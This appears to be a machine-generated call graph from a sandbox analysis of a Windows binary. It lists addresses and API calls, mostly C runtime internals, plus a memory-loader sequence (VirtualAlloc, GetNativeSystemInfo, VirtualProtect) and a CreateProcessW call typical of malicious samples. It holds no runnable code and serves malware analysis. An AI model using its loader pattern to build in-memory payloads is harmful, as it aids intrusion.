16742 7fef754eb33 16741->16742 16744 7fef754eec0 25 API calls 16741->16744 16743 7fef754ec29 16742->16743 16749 7fef754eb49 _CrtMemDumpAllObjectsSince 16742->16749 16745 7fef754ef10 25 API calls 16743->16745 16744->16742 16747 7fef754ebda 16745->16747 16748 7fef754eca1 16746->16748 16751 7fef754dbb5 16746->16751 16747->16746 16752 7fef754eec0 25 API calls 16747->16752 16750 7fef753bd70 _invalid_parameter 17 API calls 16748->16750 16757 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 16748->16757 16749->16747 16767 7fef754f000 16749->16767 16774 7fef754ee40 16749->16774 16750->16757 16755 7fef753bd70 _invalid_parameter 17 API calls 16751->16755 16752->16746 16753 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16754 7fef754ed9e 16753->16754 16755->16757 16757->16753 16760 7fef754eed7 16759->16760 16761 7fef754ee40 25 API calls 16760->16761 16762 7fef754ef07 16760->16762 16761->16760 16762->16737 16765 7fef754ef2c 16763->16765 16764 7fef754ef4d 16764->16741 16765->16764 16766 7fef754ee40 25 API calls 16765->16766 16766->16765 16768 7fef754f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16767->16768 16769 7fef754f026 _CrtMemDumpAllObjectsSince wcsxfrm 16767->16769 16768->16749 16769->16768 16770 7fef754f146 _CrtMemDumpAllObjectsSince 16769->16770 16771 7fef754f276 _CrtMemDumpAllObjectsSince 16769->16771 16770->16768 16773 7fef754f1b5 MultiByteToWideChar 16770->16773 16772 7fef754f29d MultiByteToWideChar 16771->16772 16772->16768 16773->16768 16775 7fef754ee62 16774->16775 16777 7fef754ee6e 16775->16777 16778 7fef754f360 16775->16778 16777->16749 16779 7fef754f399 16778->16779 16812 7fef754f622 16778->16812 16813 7fef754afb0 16779->16813 16780 7fef754f4f2 16785 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16780->16785 16782 7fef7550170 23 API calls 16782->16780 16784 7fef754f3ed 16788 7fef754f4c7 16784->16788 16790 7fef754afb0 _fflush_nolock 17 API calls 16784->16790 16787 7fef754f7c5 16785->16787 16786 7fef754afb0 _fflush_nolock 17 API calls 16789 7fef754f3b8 16786->16789 16787->16777 16788->16780 16817 7fef7550170 16788->16817 16789->16784 16793 7fef754afb0 _fflush_nolock 17 API calls 16789->16793 16792 7fef754f43d 16790->16792 16794 7fef754f484 16792->16794 16796 7fef754afb0 _fflush_nolock 17 API calls 16792->16796 16795 7fef754f3ca 16793->16795 16794->16788 16799 7fef754f561 16794->16799 16797 7fef754afb0 _fflush_nolock 17 API calls 16795->16797 16798 7fef754f44f 16796->16798 16797->16784 16798->16794 16802 7fef754afb0 _fflush_nolock 17 API calls 16798->16802 16800 7fef754afb0 _fflush_nolock 17 API calls 16799->16800 16801 7fef754f56e 16800->16801 16803 7fef754f5b8 16801->16803 16805 7fef754afb0 _fflush_nolock 17 API calls 16801->16805 16804 7fef754f461 16802->16804 16803->16812 16825 7fef754b530 16803->16825 16806 7fef754afb0 _fflush_nolock 17 API calls 16804->16806 16807 7fef754f580 16805->16807 16806->16794 16807->16803 16809 7fef754afb0 _fflush_nolock 17 API calls 16807->16809 16810 7fef754f592 16809->16810 16811 7fef754afb0 _fflush_nolock 17 API calls 16810->16811 16811->16803 16812->16780 16812->16782 16814 7fef754afc1 16813->16814 16815 7fef753bd70 _invalid_parameter 17 API calls 16814->16815 16816 7fef754b04b 16814->16816 16815->16816 16816->16784 16816->16786 16818 7fef7550185 16817->16818 16819 7fef754afb0 _fflush_nolock 17 API calls 16818->16819 16820 7fef75501c7 16819->16820 16821 7fef75501dc 16820->16821 16823 7fef7550326 16820->16823 16828 7fef754ab10 16820->16828 16821->16780 16823->16821 16832 7fef7549290 16823->16832 16869 7fef754b090 16825->16869 16827 7fef754b56c 16827->16812 16829 7fef754ab23 16828->16829 16830 7fef754ab35 16828->16830 16829->16823 16830->16829 16831 7fef753bd70 _invalid_parameter 17 API calls 16830->16831 16831->16829 16833 7fef75492d8 16832->16833 16838 7fef75492b6 __doserrno 16832->16838 16834 7fef7549341 __doserrno 16833->16834 16840 7fef754938c 16833->16840 16837 7fef753bd70 _invalid_parameter 17 API calls 16834->16837 16835 7fef754945b 16846 7fef754fae0 16835->16846 16837->16838 16838->16821 16840->16835 16841 7fef7549410 __doserrno 16840->16841 16843 7fef753bd70 _invalid_parameter 17 API calls 16841->16843 16843->16838 16844 7fef75494a6 __doserrno 16860 7fef754fbc0 LeaveCriticalSection 16844->16860 16847 7fef754fb25 16846->16847 16848 7fef754fb7a 16846->16848 16851 7fef754fb56 16847->16851 16852 7fef754fb3b InitializeCriticalSectionAndSpinCount 16847->16852 16849 7fef7549464 16848->16849 16850 7fef754fb81 EnterCriticalSection 16848->16850 16849->16844 16854 7fef7549520 16849->16854 16850->16849 16861 7fef7539360 LeaveCriticalSection 16851->16861 16852->16851 16862 7fef754f900 16854->16862 16856 7fef7549545 16857 7fef754959d SetFilePointer 16856->16857 16859 7fef7549552 _dosmaperr 16856->16859 16858 7fef75495c1 GetLastError 16857->16858 16857->16859 16858->16859 16859->16844 16860->16838 16861->16848 16863 7fef754f913 __doserrno 16862->16863 16864 7fef754f935 16862->16864 16863->16856 16865 7fef754f99e __doserrno 16864->16865 16866 7fef754f9e9 __doserrno 16864->16866 16867 7fef753bd70 _invalid_parameter 17 API calls 16865->16867 16866->16863 16868 7fef753bd70 _invalid_parameter 17 API calls 16866->16868 16867->16863 16868->16863 16870 7fef754b0b7 16869->16870 16871 7fef754b168 16870->16871 16873 7fef754b1a6 _CrtMemDumpAllObjectsSince 16870->16873 16878 7fef754b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 16870->16878 16872 7fef753bd70 _invalid_parameter 17 API calls 16871->16872 16872->16878 16874 7fef754b347 _CrtMemDumpAllObjectsSince 16873->16874 16879 7fef754b1cf 16873->16879 16875 7fef754b359 WideCharToMultiByte 16874->16875 16876 7fef754b3ab 16875->16876 16877 7fef754b3c1 GetLastError 16876->16877 16876->16878 16877->16878 16881 7fef754b3d0 _calloc_dbg_impl 16877->16881 16878->16827 16879->16878 16880 7fef753bd70 _invalid_parameter 17 API calls 16879->16880 16880->16878 16881->16878 16882 7fef753bd70 _invalid_parameter 17 API calls 16881->16882 16882->16878 18583 7fef75310b0 18584 7fef75310da 18583->18584 18585 7fef75310fc 18584->18585 18586 7fef7531000 4 API calls 18584->18586 18587 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18585->18587 18586->18585 18588 7fef753112c 18587->18588 16883 7fef7549fba 16892 7fef7549c4d 16883->16892 16884 7fef754a06d WriteFile 16885 7fef754a103 GetLastError 16884->16885 16884->16892 16891 7fef7549dd9 _dosmaperr __doserrno 16885->16891 16886 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16887 7fef754a9f5 16886->16887 16888 7fef7549f66 WideCharToMultiByte 16889 7fef7549fbf WriteFile 16888->16889 16888->16891 16890 7fef754a050 GetLastError 16889->16890 16889->16892 16890->16891 16890->16892 16891->16886 16892->16884 16892->16888 16892->16891 16893 7fef754a158 GetLastError 16892->16893 16894 7fef754f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 16892->16894 16895 7fef754fc00 WriteConsoleW CreateFileW _putwch_nolock 16892->16895 16896 7fef754a1b5 GetLastError 16892->16896 16893->16891 16894->16892 16895->16892 16896->16891 16487 18001a10c 16488 18001a166 16487->16488 16491 180024f28 16488->16491 16490 18001a335 16492 180024fcb 16491->16492 16493 18002506a CreateProcessW 16492->16493 16493->16490 18589 7fef754bcbd 18590 7fef754b99c 18589->18590 18591 7fef754cc93 18590->18591 18594 7fef754bada 18590->18594 18592 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 18591->18592 18593 7fef753bd70 _invalid_parameter 17 API calls 18591->18593 18595 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18592->18595 18593->18592 18597 7fef753bd70 _invalid_parameter 17 API calls 18594->18597 18596 7fef754cd90 18595->18596 18597->18592 16494 2c0000 16495 2c0183 16494->16495 16496 2c043e VirtualAlloc 16495->16496 16499 2c0462 16496->16499 16497 2c0531 GetNativeSystemInfo 16498 2c056d VirtualAlloc 16497->16498 16500 2c0a00 16497->16500 16501 2c058b 16498->16501 16499->16497 16499->16500 16501->16500 16502 2c09d9 VirtualProtect 16501->16502 16502->16501 18602 7fef7542c9f 18603 7fef7542caf 18602->18603 18604 7fef7542ca6 18602->18604 18604->18603 18605 7fef753bd70 _invalid_parameter 17 API calls 18604->18605 18605->18603 18606 7fef754809f 18607 7fef75480b0 _calloc_dbg_impl 18606->18607 18608 7fef7548145 _calloc_dbg_impl 18606->18608 18608->18607 18609 7fef753bd70 _invalid_parameter 17 API calls 18608->18609 18609->18607 16905 7fef754a7a0 16912 7fef754a61f 16905->16912 16906 7fef754a726 WideCharToMultiByte 16907 7fef754a791 GetLastError 16906->16907 16906->16912 16910 7fef754a887 _dosmaperr __doserrno 16907->16910 16908 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16911 7fef754a9f5 16908->16911 16909 7fef754a7b0 WriteFile 16909->16912 16913 7fef754a857 GetLastError 16909->16913 16910->16908 16912->16906 16912->16909 16912->16910 16913->16912 16914 7fef7533faa 16915 7fef7533e30 LeaveCriticalSection 16914->16915 16916 7fef7533fb6 GetCurrentThreadId 16915->16916 16917 7fef7533fea SetLastError 16916->16917 18618 7fef7535cad 18619 7fef7535cb8 18618->18619 18622 7fef7535e1a _realloc_dbg 18619->18622 18623 7fef7539360 LeaveCriticalSection 18619->18623 18621 7fef7536201 18623->18621 16674 7fef753aca8 16675 7fef753acb2 16674->16675 16676 7fef75374e0 __crtExitProcess 3 API calls 16675->16676 16677 7fef753acbc RtlAllocateHeap 16676->16677 18633 7fef7535854 18634 7fef753585b _calloc_dbg_impl 18633->18634 18635 7fef753c020 _free_base 2 API calls 18634->18635 18636 7fef75359d5 18635->18636 16949 7fef753cb4f 16954 7fef753cb5c 16949->16954 16950 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16951 7fef753cf0f 16950->16951 16952 7fef753cbeb GetStdHandle 16953 7fef753cc94 16952->16953 16956 7fef753cc07 std::exception::_Copy_str 16952->16956 16953->16950 16954->16952 16954->16953 16955 7fef753cc99 16954->16955 16955->16953 16978 7fef7541640 16955->16978 16956->16953 16958 7fef753cc73 WriteFile 16956->16958 16958->16953 16959 7fef753cd10 16960 7fef7537ff0 _invoke_watson_if_error 16 API calls 16959->16960 16961 7fef753cd3d GetModuleFileNameW 16960->16961 16962 7fef753cd68 16961->16962 16966 7fef753cdb1 16961->16966 16963 7fef7541640 17 API calls 16962->16963 16964 7fef753cd84 16963->16964 16967 7fef7537ff0 _invoke_watson_if_error 16 API calls 16964->16967 16965 7fef753ce5e 16998 7fef7542d80 16965->16998 16966->16965 16988 7fef7543380 16966->16988 16967->16966 16969 7fef753ce76 16971 7fef7537ff0 _invoke_watson_if_error 16 API calls 16969->16971 16973 7fef753cea3 16971->16973 16972 7fef753ce31 16974 7fef7537ff0 _invoke_watson_if_error 16 API calls 16972->16974 16975 7fef7542d80 17 API calls 16973->16975 16974->16965 16976 7fef753ceb9 16975->16976 16977 7fef7537ff0 _invoke_watson_if_error 16 API calls 16976->16977 16977->16953 16979 7fef7541661 16978->16979 16980 7fef75416c2 16979->16980 16983 7fef7541700 _calloc_dbg_impl 16979->16983 16982 7fef753bd70 _invalid_parameter 17 API calls 16980->16982 16981 7fef7541832 _calloc_dbg_impl 16984 7fef75416f6 _calloc_dbg_impl 16981->16984 16987 7fef753bd70 _invalid_parameter 17 API calls 16981->16987 16982->16984 16983->16981 16985 7fef75417f4 16983->16985 16984->16959 16986 7fef753bd70 _invalid_parameter 17 API calls 16985->16986 16986->16984 16987->16984 16990 7fef75433a6 16988->16990 16989 7fef754342f 16991 7fef753bd70 _invalid_parameter 17 API calls 16989->16991 16990->16989 16992 7fef754346d _calloc_dbg_impl 16990->16992 16995 7fef75433bc _calloc_dbg_impl 16990->16995 16991->16995 16993 7fef75435fb 16992->16993 16992->16995 16996 7fef7543639 _calloc_dbg_impl 16992->16996 16994 7fef753bd70 _invalid_parameter 17 API calls 16993->16994 16994->16995 16995->16972 16996->16995 16997 7fef753bd70 _invalid_parameter 17 API calls 16996->16997 16997->16995 16999 7fef7542da1 16998->16999 17000 7fef7542e02 16999->17000 17002 7fef7542e40 _calloc_dbg_impl 16999->17002 17001 7fef753bd70 _invalid_parameter 17 API calls 17000->17001 17005 7fef7542e36 _calloc_dbg_impl 17001->17005 17003 7fef7542f34 17002->17003 17004 7fef7542f72 _calloc_dbg_impl 17002->17004 17006 7fef753bd70 _invalid_parameter 17 API calls 17003->17006 17007 7fef75430b5 17004->17007 17009 7fef75430f3 _calloc_dbg_impl 17004->17009 17005->16969 17006->17005 17008 7fef753bd70 _invalid_parameter 17 API calls 17007->17008 17008->17005 17009->17005 17010 7fef753bd70 _invalid_parameter 17 API calls 17009->17010 17010->17005 18175 7fef7550550 18176 7fef7550575 18175->18176 18177 7fef755055e 18175->18177 18177->18176 18178 7fef7550568 CloseHandle 18177->18178 18178->18176 17645 7fef753425a FlsGetValue FlsSetValue 17646 7fef7534283 17645->17646 18179 7fef753e55a 18180 7fef753e564 18179->18180 18181 7fef753e5c2 RtlLookupFunctionEntry 18180->18181 18182 7fef753e601 18180->18182 18181->18182 18637 7fef753405b 18639 7fef753406e 18637->18639 18643 7fef7539360 LeaveCriticalSection 18639->18643 18641 7fef7534224 18642 7fef75341bb _updatetlocinfoEx_nolock 18644 7fef7539360 LeaveCriticalSection 18642->18644 18643->18642 18644->18641 18183 7fef754595c 18184 7fef753cf50 terminate 35 API calls 18183->18184 18185 7fef7545961 18184->18185 17022 7fef7535357 17025 7fef7539360 LeaveCriticalSection 17022->17025 17024 7fef7535361 17025->17024 18650 7fef753a057 18651 7fef753a061 18650->18651 18652 7fef753a234 18651->18652 18653 7fef753a08e __initmbctable 18651->18653 18655 7fef753a25d IsValidCodePage 18652->18655 18658 7fef753a22d __initmbctable 18652->18658 18659 7fef753a5e0 __initmbctable 19 API calls 18653->18659 18654 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18656 7fef753a470 18654->18656 18657 7fef753a27b GetCPInfo 18655->18657 18655->18658 18657->18658 18660 7fef753a295 __initmbctable 18657->18660 18658->18654 18659->18658 18661 7fef753a5e0 __initmbctable 19 API calls 18660->18661 18661->18658 17647 7fef7550e40 17648 7fef7550e50 17647->17648 17649 7fef7550e5e 17647->17649 17648->17649 17650 7fef7533e00 3 API calls 17648->17650 17650->17649 18662 7fef7551040 18665 7fef753e8f0 18662->18665 18664 7fef755108f 18666 7fef753e90d 18665->18666 18667 7fef7543cc0 __SehTransFilter 39 API calls 18666->18667 18668 7fef753e980 18667->18668 18668->18664 18190 7fef754f53e 18191 7fef754f55c 18190->18191 18192 7fef754f74d 18191->18192 18193 7fef7550170 23 API calls 18191->18193 18194 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18192->18194 18193->18192 18195 7fef754f7c5 18194->18195 16551 7fef7537640 GetStartupInfoW 16560 7fef7537676 _calloc_dbg 16551->16560 16552 7fef7537689 16553 7fef7537ce0 SetHandleCount 16553->16552 16554 7fef7537b95 GetStdHandle 16556 7fef7537c7b 16554->16556 16557 7fef7537bb9 16554->16557 16555 7fef7537ab9 16555->16553 16555->16554 16555->16556 16556->16553 16557->16556 16558 7fef7537bc8 GetFileType 16557->16558 16558->16556 16559 7fef7537beb InitializeCriticalSectionAndSpinCount 16558->16559 16559->16552 16559->16556 16560->16552 16560->16555 16562 7fef7537a32 InitializeCriticalSectionAndSpinCount 16560->16562 16563 7fef7537a19 GetFileType 16560->16563 16562->16552 16562->16555 16563->16555 16563->16562 17651 7fef753ae40 17652 7fef753d490 std::exception::_Copy_str 17 API calls 17651->17652 17653 7fef753ae59 17652->17653 17654 7fef7537ff0 _invoke_watson_if_error 16 API calls 17653->17654 17655 7fef753ae86 std::exception::_Copy_str 17654->17655 17659 7fef753af3a std::exception::_Copy_str 17655->17659 17674 7fef7540fd0 17655->17674 17657 7fef753af0d 17658 7fef7537ff0 _invoke_watson_if_error 16 API calls 17657->17658 17658->17659 17661 7fef753b2e0 17659->17661 17662 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17659->17662 17660 7fef753b33e 17684 7fef7540cc0 17660->17684 17661->17660 17663 7fef753d490 std::exception::_Copy_str 17 API calls 17661->17663 17662->17661 17665 7fef753b311 17663->17665 17667 7fef7537ff0 _invoke_watson_if_error 16 API calls 17665->17667 17667->17660 17668 7fef753b37d 17672 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17668->17672 17669 7fef753cff0 terminate 34 API calls 17670 7fef753b373 17669->17670 17671 7fef7537090 _exit 33 API calls 17670->17671 17671->17668 17673 7fef753b3a0 17672->17673 17675 7fef7540ff7 17674->17675 17677 7fef7540ff0 __SehTransFilter 17674->17677 17676 7fef7541055 17675->17676 17679 7fef7541093 _calloc_dbg_impl 17675->17679 17678 7fef753bd70 _invalid_parameter 17 API calls 17676->17678 17677->17657 17678->17677 17679->17677 17680 7fef754111a 17679->17680 17682 7fef7541158 17679->17682 17681 7fef753bd70 _invalid_parameter 17 API calls 17680->17681 17681->17677 17682->17677 17683 7fef753bd70 _invalid_parameter 17 API calls 17682->17683 17683->17677 17702 7fef7533d00 RtlEncodePointer 17684->17702 17686 7fef7540cf6 17687 7fef7540d23 LoadLibraryW 17686->17687 17688 7fef7540e15 17686->17688 17689 7fef7540d44 GetProcAddress 17687->17689 17698 7fef7540d3d 17687->17698 17691 7fef7540e39 DecodePointer DecodePointer 17688->17691 17701 7fef7540e68 17688->17701 17690 7fef7540d6a 7 API calls 17689->17690 17689->17698 17690->17688 17695 7fef7540df3 GetProcAddress EncodePointer 17690->17695 17691->17701 17692 7fef7540f60 DecodePointer 17692->17698 17693 7fef7540eed DecodePointer 17694 7fef7540f0d 17693->17694 17694->17692 17699 7fef7540f2f DecodePointer 17694->17699 17695->17688 17696 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17697 7fef753b358 17696->17697 17697->17668 17697->17669 17698->17696 17699->17692 17700 7fef7540ec8 17699->17700 17700->17692 17701->17693 17701->17694 17701->17700 17702->17686 17703 7fef7539240 17704 7fef753925f 17703->17704 17705 7fef753924d 17703->17705 17706 7fef7539281 InitializeCriticalSectionAndSpinCount 17704->17706 17707 7fef7539295 17704->17707 17706->17707 17709 7fef7539360 LeaveCriticalSection 17707->17709 17709->17705 18196 7fef7531140 18197 7fef753116a 18196->18197 18198 7fef753118c 18197->18198 18199 7fef753119a FileTimeToSystemTime 18197->18199 18201 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18198->18201 18199->18198 18200 7fef75311ae 18199->18200 18204 7fef7531000 GetThreadLocale GetDateFormatA 18200->18204 18203 7fef75311d0 18201->18203 18205 7fef7531062 GetThreadLocale GetTimeFormatA 18204->18205 18206 7fef753105b 18204->18206 18205->18206 18206->18198 18669 7fef754dc41 18670 7fef754ee40 25 API calls 18669->18670 18671 7fef754da75 18670->18671 18672 7fef754eca1 18671->18672 18674 7fef754dbb5 18671->18674 18673 7fef753bd70 _invalid_parameter 17 API calls 18672->18673 18675 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 18672->18675 18673->18675 18678 7fef753bd70 _invalid_parameter 17 API calls 18674->18678 18676 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18675->18676 18677 7fef754ed9e 18676->18677 18678->18675 18679 7fef7538040 18680 7fef753805b GetModuleFileNameA 18679->18680 18681 7fef7538056 18679->18681 18683 7fef7538083 18680->18683 18682 7fef753aa40 __initmbctable 24 API calls 18681->18682 18682->18680 18684 7fef753d04a 18685 7fef753d1d8 DecodePointer 18684->18685 18686 7fef753d1e8 18685->18686 18687 7fef753d1f0 18686->18687 18688 7fef7537090 _exit 33 API calls 18686->18688 18689 7fef753d209 18686->18689 18688->18689 18691 7fef753d289 18689->18691 18693 7fef7533d00 RtlEncodePointer 18689->18693 18691->18687 18694 7fef7539360 LeaveCriticalSection 18691->18694 18693->18691 18694->18687 17034 7fef7551370 17037 7fef754af60 17034->17037 17038 7fef754af74 17037->17038 17039 7fef754af98 LeaveCriticalSection 17037->17039 17042 7fef7539360 LeaveCriticalSection 17038->17042 17041 7fef754af96 17039->17041 17042->17041 18207 7fef754e16f 18209 7fef754e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 18207->18209 18208 7fef754eadf 18212 7fef754ef10 25 API calls 18208->18212 18209->18208 18211 7fef754eec0 25 API calls 18209->18211 18213 7fef754da75 18209->18213 18210 7fef754eca1 18219 7fef753bd70 _invalid_parameter 17 API calls 18210->18219 18226 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 18210->18226 18211->18208 18214 7fef754eafd 18212->18214 18213->18210 18220 7fef754dbb5 18213->18220 18215 7fef754eb33 18214->18215 18217 7fef754eec0 25 API calls 18214->18217 18216 7fef754ec29 18215->18216 18227 7fef754eb49 _CrtMemDumpAllObjectsSince 18215->18227 18218 7fef754ef10 25 API calls 18216->18218 18217->18215 18228 7fef754ebda 18218->18228 18219->18226 18224 7fef753bd70 _invalid_parameter 17 API calls 18220->18224 18221 7fef754eec0 25 API calls 18221->18213 18222 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18223 7fef754ed9e 18222->18223 18224->18226 18225 7fef754f000 wcsxfrm 2 API calls 18225->18227 18226->18222 18227->18225 18227->18228 18229 7fef754ee40 25 API calls 18227->18229 18228->18213 18228->18221 18229->18227 16260 7fef7538670 GetEnvironmentStringsW 16261 7fef7538690 16260->16261 16263 7fef7538697 WideCharToMultiByte 16260->16263 16264 7fef7538733 16263->16264 16265 7fef753875f FreeEnvironmentStringsW 16263->16265 16264->16265 16266 7fef753876e WideCharToMultiByte 16264->16266 16265->16261 16267 7fef75387c2 FreeEnvironmentStringsW 16266->16267 16268 7fef75387aa 16266->16268 16267->16261 16268->16267 16306 7fef7533471 16307 7fef753347a 16306->16307 16316 7fef75334bc 16306->16316 16308 7fef7533496 16307->16308 16318 7fef75370b0 16307->16318 16310 7fef7537d00 _ioterm DeleteCriticalSection 16308->16310 16311 7fef753349b 16310->16311 16312 7fef7533e00 3 API calls 16311->16312 16313 7fef75334a0 16312->16313 16321 7fef75388d0 HeapDestroy 16313->16321 16315 7fef75334a5 16315->16316 16317 7fef7533e00 3 API calls 16315->16317 16317->16316 16322 7fef7537280 16318->16322 16321->16315 16323 7fef7537296 _exit 16322->16323 16324 7fef75372c7 RtlDecodePointer 16323->16324 16331 7fef7537368 _initterm 16323->16331 16343 7fef753744e 16323->16343 16326 7fef75372e5 DecodePointer 16324->16326 16324->16331 16325 7fef753745e 16328 7fef75370c3 16325->16328 16329 7fef7537520 _exit LeaveCriticalSection 16325->16329 16339 7fef7537314 16326->16339 16328->16308 16330 7fef7537479 16329->16330 16369 7fef75374e0 16330->16369 16331->16343 16346 7fef7536210 16331->16346 16335 7fef753736d DecodePointer 16345 7fef7533d00 RtlEncodePointer 16335->16345 16339->16331 16339->16335 16342 7fef7537391 DecodePointer DecodePointer 16339->16342 16344 7fef7533d00 RtlEncodePointer 16339->16344 16340 7fef7537449 16359 7fef7536f10 16340->16359 16342->16339 16343->16325 16366 7fef7537520 16343->16366 16344->16339 16345->16339 16348 7fef7536229 16346->16348 16347 7fef753628f 16372 7fef753bd70 DecodePointer 16347->16372 16348->16347 16350 7fef75362cb 16348->16350 16376 7fef7539360 LeaveCriticalSection 16350->16376 16351 7fef75362c3 16351->16343 16353 7fef7537100 16351->16353 16354 7fef7537112 16353->16354 16355 7fef75371e4 DecodePointer 16354->16355 16356 7fef75371fe 16355->16356 16401 7fef7533d00 RtlEncodePointer 16356->16401 16358 7fef7537219 16358->16340 16402 7fef75363e0 16359->16402 16361 7fef7536f33 16362 7fef7536f8e 16361->16362 16410 7fef7536660 16361->16410 16364 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16362->16364 16365 7fef7536fa7 16364->16365 16365->16343 16478 7fef7539360 LeaveCriticalSection 16366->16478 16368 7fef753752e 16368->16325 16479 7fef7537490 GetModuleHandleW 16369->16479 16373 7fef753bdd0 16372->16373 16374 7fef753bdac 16372->16374 16377 7fef753be00 16373->16377 16374->16351 16376->16351 16380 7fef753be50 16377->16380 16381 7fef753be81 _invalid_parameter 16380->16381 16382 7fef753be8d RtlCaptureContext RtlLookupFunctionEntry 16380->16382 16381->16382 16383 7fef753bf64 16382->16383 16384 7fef753bf1c RtlVirtualUnwind 16382->16384 16385 7fef753bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16383->16385 16384->16385 16386 7fef753bfde _invalid_parameter 16385->16386 16389 7fef7533280 16386->16389 16388 7fef753be2d GetCurrentProcess TerminateProcess 16388->16374 16391 7fef7533289 16389->16391 16390 7fef7533294 16390->16388 16391->16390 16392 7fef7533720 RtlCaptureContext RtlLookupFunctionEntry 16391->16392 16393 7fef7533764 RtlVirtualUnwind 16392->16393 16394 7fef75337a5 16392->16394 16395 7fef75337c7 IsDebuggerPresent 16393->16395 16394->16395 16400 7fef7538d90 16395->16400 16397 7fef7533826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16398 7fef7533844 _invalid_parameter 16397->16398 16399 7fef753384e GetCurrentProcess TerminateProcess 16397->16399 16398->16399 16399->16388 16400->16397 16401->16358 16403 7fef75363f1 16402->16403 16404 7fef7536447 16403->16404 16407 7fef7536480 16403->16407 16405 7fef753bd70 _invalid_parameter 17 API calls 16404->16405 16406 7fef753647b 16405->16406 16406->16361 16409 7fef7536504 16407->16409 16414 7fef7539360 LeaveCriticalSection 16407->16414 16409->16361 16411 7fef7536681 _CrtMemDumpAllObjectsSince 16410->16411 16415 7fef7536850 16411->16415 16413 7fef7536698 _LocaleUpdate::~_LocaleUpdate 16413->16362 16414->16406 16416 7fef7536871 16415->16416 16417 7fef7536ba6 16416->16417 16420 7fef75368ed _CrtIsValidPointer 16416->16420 16445 7fef7539360 LeaveCriticalSection 16417->16445 16419 7fef7536bb0 16419->16413 16421 7fef753695e IsBadReadPtr 16420->16421 16422 7fef7536976 16420->16422 16431 7fef753692f 16420->16431 16421->16422 16423 7fef7536ad2 16422->16423 16424 7fef7536a29 16422->16424 16427 7fef7536b2d 16423->16427 16428 7fef7536add 16423->16428 16425 7fef7536abe 16424->16425 16426 7fef7536a86 IsBadReadPtr 16424->16426 16433 7fef7536bf0 16425->16433 16426->16425 16426->16431 16427->16431 16432 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16427->16432 16429 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16428->16429 16429->16431 16431->16413 16432->16431 16434 7fef7536c28 16433->16434 16435 7fef7536e25 _LocaleUpdate::~_LocaleUpdate 16434->16435 16437 7fef7536c7a _CrtMemDumpAllObjectsSince 16434->16437 16436 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16435->16436 16438 7fef7536e89 16436->16438 16440 7fef7536ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16437->16440 16446 7fef753c260 16437->16446 16438->16431 16450 7fef753c0c0 16440->16450 16442 7fef7536e12 16442->16431 16443 7fef7536dc7 16443->16442 16453 7fef7536ea0 16443->16453 16445->16419 16447 7fef753c286 _CrtMemDumpAllObjectsSince wcsxfrm 16446->16447 16449 7fef753c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16447->16449 16457 7fef753f4d0 16447->16457 16449->16440 16468 7fef7542260 16450->16468 16452 7fef753c103 16452->16443 16454 7fef7536ed1 16453->16454 16455 7fef7536ebd 16453->16455 16454->16442 16455->16454 16456 7fef753be00 _invalid_parameter 16 API calls 16455->16456 16456->16454 16458 7fef753f4f9 _CrtMemDumpAllObjectsSince 16457->16458 16461 7fef753f570 16458->16461 16460 7fef753f550 _LocaleUpdate::~_LocaleUpdate 16460->16449 16462 7fef753f599 MultiByteToWideChar 16461->16462 16464 7fef753f60b malloc _calloc_dbg_impl _MarkAllocaS 16462->16464 16466 7fef753f604 _CrtMemDumpAllObjectsSince_stat 16462->16466 16465 7fef753f68b MultiByteToWideChar 16464->16465 16464->16466 16465->16466 16467 7fef753f6ca GetStringTypeW 16465->16467 16466->16460 16467->16466 16469 7fef754228b 16468->16469 16470 7fef75422e1 16469->16470 16471 7fef754231f 16469->16471 16472 7fef753bd70 _invalid_parameter 17 API calls 16470->16472 16473 7fef7542385 16471->16473 16476 7fef75423c3 _calloc_dbg_impl 16471->16476 16475 7fef7542315 _calloc_dbg_impl 16472->16475 16474 7fef753bd70 _invalid_parameter 17 API calls 16473->16474 16474->16475 16475->16452 16476->16475 16477 7fef753bd70 _invalid_parameter 17 API calls 16476->16477 16477->16475 16478->16368 16480 7fef75374b2 GetProcAddress 16479->16480 16481 7fef75374d1 ExitProcess 16479->16481 16480->16481 17043 7fef7541b64 17045 7fef7541b9d 17043->17045 17044 7fef754ab10 17 API calls 17046 7fef7541c86 17044->17046 17045->17044 17045->17046 17047 7fef7541bed 17045->17047 17046->17047 17048 7fef7549290 23 API calls 17046->17048 17048->17047 18234 7fef7551160 18237 7fef7544e90 18234->18237 18236 7fef7551179 18238 7fef7544ebb 18237->18238 18239 7fef7544ecf 18237->18239 18238->18239 18240 7fef753cf50 terminate 35 API calls 18238->18240 18239->18236 18240->18239 16654 7fef7538860 HeapCreate 16655 7fef7538891 GetVersion 16654->16655 16656 7fef753888d 16654->16656 16657 7fef75388c1 